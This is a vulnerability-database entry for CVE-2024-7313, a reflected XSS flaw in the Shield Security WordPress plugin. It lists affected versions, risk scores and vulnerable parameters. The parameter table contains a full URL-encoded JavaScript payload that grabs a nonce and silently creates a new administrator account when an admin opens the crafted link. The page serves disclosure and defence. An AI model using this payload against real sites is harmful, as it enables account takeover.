Lucene search
+L

CVE-2024-7313

🗓️ 26 Aug 2024 06:00:03Reported by WPScanType 
cve
 cve
🔗 web.nvd.nist.gov👁 105 Views🌐 WEB

The Shield Security WordPress plugin has a Reflected Cross-Site Scripting vulnerability pre version 20.0.

Related
Detection
Affected
Refs
Paths
NVD
Vulners
Vulnrichment
Node
[
  {
    "vendor": "Unknown",
    "product": "Shield Security",
    "versions": [
      {
        "status": "affected",
        "versionType": "semver",
        "version": "0",
        "lessThan": "20.0.6"
      }
    ],
    "defaultStatus": "unaffected"
  }
]
ParameterPositionPathDescriptionCWE
nav_subquery paramwp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=%3Cscript%3Evar%20xhrNonce%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhrNonce.open%28%27GET%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhrNonce.onload%20%3D%20function%28%29%20%7B%20if%20%28xhrNonce.status%20%3D%3D%3D%20200%29%20%7B%20var%20nonce%20%3D%20xhrNonce.responseText.match%28/name%3D%22_wpnonce_create-user%22%20value%3D%22%28%5Ba-zA-Z0-9%5D%2B%29%22/%29%5B1%5D%3B%20var%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhr.open%28%27POST%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhr.setRequestHeader%28%27Content-Type%27%2C%20%27application/x-www-form-urlencoded%27%29%3B%20xhr.setRequestHeader%28%27Referer%27%2C%20%27http%3A//127.0.0.1/wp-admin/user-new.php%27%29%3B%20xhr.setRequestHeader%28%27Origin%27%2C%20%27http%3A//127.0.0.1%27%29%3B%20var%20params%20%3D%20%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%20%2B%20nonce%20%2B%20%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%26user_login%3Dnick%26email%3Dnick%2540test.com%26first_name%3Dnick%26last_name%3Dtest%26url%3Dtest%26pass1%3DHaxorStrongAFPassword123%2521%2521%26pass2%3DHaxorStrongAFPassword123%2521%2521%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B%20xhr.send%28params%29%3B%20xhr.onload%20%3D%20function%28%29%20%7B%20if%20%28xhr.status%20%3D%3D%20200%29%20%7B%20console.log%28%27Admin%20user%20created%20successfully%27%29%3B%20window.location.href%20%3D%20%27http%3A//127.0.0.1/wp-admin/admin.php%3Fpage%3Dicwp-wpsf-plugin%26nav%3Ddashboard%26nav_sub%3Doverview%27%3B%20%7D%20else%20%7B%20console.log%28%27Error%20occurred%3A%20%27%20%2B%20xhr.statusText%29%3B%20%7D%20%7D%3B%20%7D%3B%20else%20%7B%20console.log%28%27Error%20fetching%20nonce%3A%20%27%20%2B%20xhrNonce.statusText%29%3B%20%7D%20%7D%3B%20xhrNonce.send%28%29%3B%3C/script%3EReflected XSS payload carried via vulnerable plugin UI parameter that can trigger admin account creation when loaded by an admin.CWE-79
_wpnonce_create-userrequest bodywp-admin/user-new.phpPOST-based user creation endpoint exploited after XSS to create a new administrator account using crafted form fields and nonce.CWE-79
_wp_http_refererrequest bodywp-admin/user-new.phpPOST-based user creation endpoint exploited after XSS to create a new administrator account using crafted form fields and nonce.CWE-79
user_loginrequest bodywp-admin/user-new.phpPOST-based user creation endpoint exploited after XSS to create a new administrator account using crafted form fields and nonce.CWE-79
emailrequest bodywp-admin/user-new.phpPOST-based user creation endpoint exploited after XSS to create a new administrator account using crafted form fields and nonce.CWE-79
first_namerequest bodywp-admin/user-new.phpPOST-based user creation endpoint exploited after XSS to create a new administrator account using crafted form fields and nonce.CWE-79
last_namerequest bodywp-admin/user-new.phpPOST-based user creation endpoint exploited after XSS to create a new administrator account using crafted form fields and nonce.CWE-79
urlrequest bodywp-admin/user-new.phpPOST-based user creation endpoint exploited after XSS to create a new administrator account using crafted form fields and nonce.CWE-79
pass1request bodywp-admin/user-new.phpPOST-based user creation endpoint exploited after XSS to create a new administrator account using crafted form fields and nonce.CWE-79
pass2request bodywp-admin/user-new.phpPOST-based user creation endpoint exploited after XSS to create a new administrator account using crafted form fields and nonce.CWE-79
Rows per page

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jun 2026 08:19Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.16.1
EPSS0.01444
SSVC
105